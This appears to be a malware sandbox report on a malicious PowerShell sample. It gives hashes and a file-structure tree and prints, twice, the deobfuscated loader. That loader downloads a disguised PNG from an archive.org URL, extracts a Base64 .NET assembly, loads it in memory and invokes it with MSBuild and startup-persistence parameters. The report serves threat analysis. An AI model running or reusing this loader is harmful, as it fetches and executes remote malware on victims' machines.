Malicious
Malicious

18f6a95197e9b5a5de1c6092459afde4

PowerShell
|
MD5: 18f6a95197e9b5a5de1c6092459afde4
|
Size: 1.03 MB
|
application/x-powershell

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
18f6a95197e9b5a5de1c6092459afde4
Sha1
f9b13daf77414133e425afd47c9108f55bd2d0e3
Sha256
1d77f0c7f93f79c5884c8731ff55c8ebb23fdf112e927851abd8ef3b73d130d7
Sha384
bde1fe4f68366a32c788bf14b8d038b367274e26ac469684f89ea81e9999ad93007824598189c940eb4d695de4a02903
Sha512
01c619bd4de72bf0e47c5b7ac1c975f02a9473e2a0e2c72ff9809e6ec229591598bedb58e0a31233c13a53acce0caca6d1d168811ee46ae6f15b312ae200b9f1
SSDeep
12288:awt4c9W3mDO1GzTR2Fwt4c9W3mDO1GzTR2hwt4c9W3mDO1GzTR2m:Z4+W2KFy4+W2KFu4+W2KFm
TLSH
EB25CF5E352A457E6586B0BC22094162F08EC7E1C36EE3F2D460D868E095CBDD1BE7B7
File Structure
18f6a95197e9b5a5de1c6092459afde4
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Artefacts
Name
 Value
Deobfuscated PowerShell

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/optimized_msi_20250814/optimized_MSI.png" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "mUDZmljYlVTO 0IjYiJTNxMDNhdTN1MjNkRDN3gDNiBTN0MmNzkDM4QGO0IzNwcDOidjZ5QmNzE2MkJ2MzAjZhZTP thmJzcTOhBTY4YTPzlmJzYWYmFTY4YTP4V2P0hHdukGcvN2LyIjMwMTOzAjM3QDO0AzM2ADNx8yN 1gTO3UDO3YTOyATN4YjMwQTMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "MSBuild", "", "MSBuild", "", "", "", "Name_File", "js", "1", "", "", "0", "startup_onstart") } ))
18f6a95197e9b5a5de1c6092459afde4 (1.03 MB)
File Structure
18f6a95197e9b5a5de1c6092459afde4
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/optimized_msi_20250814/optimized_MSI.png" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "mUDZmljYlVTO 0IjYiJTNxMDNhdTN1MjNkRDN3gDNiBTN0MmNzkDM4QGO0IzNwcDOidjZ5QmNzE2MkJ2MzAjZhZTP thmJzcTOhBTY4YTPzlmJzYWYmFTY4YTP4V2P0hHdukGcvN2LyIjMwMTOzAjM3QDO0AzM2ADNx8yN 1gTO3UDO3YTOyATN4YjMwQTMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "MSBuild", "", "MSBuild", "", "", "", "Name_File", "js", "1", "", "", "0", "startup_onstart") } ))

Malicious

18f6a95197e9b5a5de1c6092459afde4 > [Base64-Block]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙